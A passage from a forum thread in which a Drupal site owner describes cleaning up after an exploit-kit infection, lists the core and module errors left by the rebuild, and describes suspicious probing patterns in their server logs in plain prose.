if the file gets infected or any folders get created, then the server is mangled and this becomes GoDaddy's problem to figure out and I'm looking for at minimum a refund. If it stays stable and the way I left it, then maybe I've gotten rid of this exploit kit for now.
Unfortunately trashing the whole site and restarting with a raft of brand new modules all at once has come with it's own set of issues to debug. The site is functioning somewhat OK and I've done a lot of debugging and fixing of individual errors, more to go but about 80% done just a weird glitch with wysiwyg editors and some orphaned context giving an error in ctools thats a bit problematic.
fingers crossed
Honey pot directory seems
Honey pot directory seems clean now after about 24h, so far so good. Although there are a variety of Drupal core features which are now broken. Dont think that the breaks have to do with collateral damage from the exploit but rather with the disruption of the fix.
I wont get into trying to debug them here as there are issue threads for that within the individual modules and core, but I'll list them here for those who may end up with this problem
-- pm_disable in private messages. Somewhere along the line the pm_disable table was created, I guess, and the update.php was never notified so it couldn't get updated in the schema. Other aspects of private mesages were also broken, I had to disable the module because viewing user profiles became so broken it would return a fatal error. At first I just stripped out the code referencing this table, but there were further (fatal) errors so I had to strip the entire module which is annoying. Probably some oversight in a commit that causes update.php to stumble.
-- WYSIWYG editor profiles all became broken and no longer work despite reinstalling the js libraries. Getting nonfatal errors on any view that tries to present one and it only shows the basic editor (ie. forums, comments). Rebuilding the WYSIWYG profiles for filtered, unfiltered and plaintext of little use, another problem to hack through.
-- Views Slideshow is busted. Slideshows appear correctly but do not start sliding. Will have to fumble around in there and try to hack them back into service. Despite resetting and saving settings, still no dice.
-- User images gone. My bad I should have made more effort to save them but in the franticness they all got lost.
-- CTOOLS giving the following error all over the place "Undefined index: entity:group in ctools_context_entity_get_child() (line 32 " Still trying to figure this one out. Probably a problem not dissimilar to what happened with private messages. Annoying at beset.
Some other miscellaneous glitches and errors to fix.
One more interesting thing
One more interesting thing that I do think was as a result of the exploit...
The RSS feeds were filled with whacks of bit.ly entries that redirected to the site, these links now that the site is clean are giving page does not exist errors. I use twitterfeed to autopublish updates to the site to social media, and there are a bunch of bit.ly links in there that do not follow the normal protocol published to the RSS feed. Perhaps it was updating the RSS feed to try to lure feed subscribers to hit pages that it had infected? Not sure. The links all lead to dead pages, and interestingly enough, the module CommentRSS feeds are not effected, only pages that already came with feeds in the Drupal Core.
Some interesting log entries
These log entries I beleive may be related to the blackhole exploit, I am only posting them for those who may be curious (I have shared this forum post with a SOPHOS antivirus technician and some other experts). These are not Drupal files that this is attempting to hit, these are files which have not existed on my server for around two years. The pattern is interesting. They are getting 403 errors as I have blacklisted all entries from outside of USA and Canada
What seems to be happening in rapid succession, in many different bursts across the log entries is this
1. A russian attempts to directly zap a very old file that hasnt existed in a couple of years, gets a 403 error
2. This same IP then attempts to probe the root URL
3. The IP switches to a different russian IP using a different browser setup (sometimes reporting both WinNT and Mac safari as the browser agent simultaneously) and zap the original IP
4. the second IP attempts to probe the root URL and again gets the 403 error
The files they are trying to pop have been long gone for years so they may not be directly linked to my infection woes. However seeing this pattern repeated in rapid succession all over the logs is something curious and interesting.
Definitely makes the case for blocking countries by IP range. While there are routes around it using proxies and tunnels, it at least reduces your network surface for attack. In reading about Blackhole Exploit, apparently the inventor leases time on his own servers (presumably in Russia as the software originates in Russian and all the documentation for purchasing use of his kit is in Russian) by the day, week, or month and he retains 100% control over his code using encryption to those who have leased his software for use on their own servers by the year or half year. There are also traffic bouncers that are presumably another monetization route for the kit whereby the domain names rapidly change by the hour.
Just an interesting digression for those following the thread.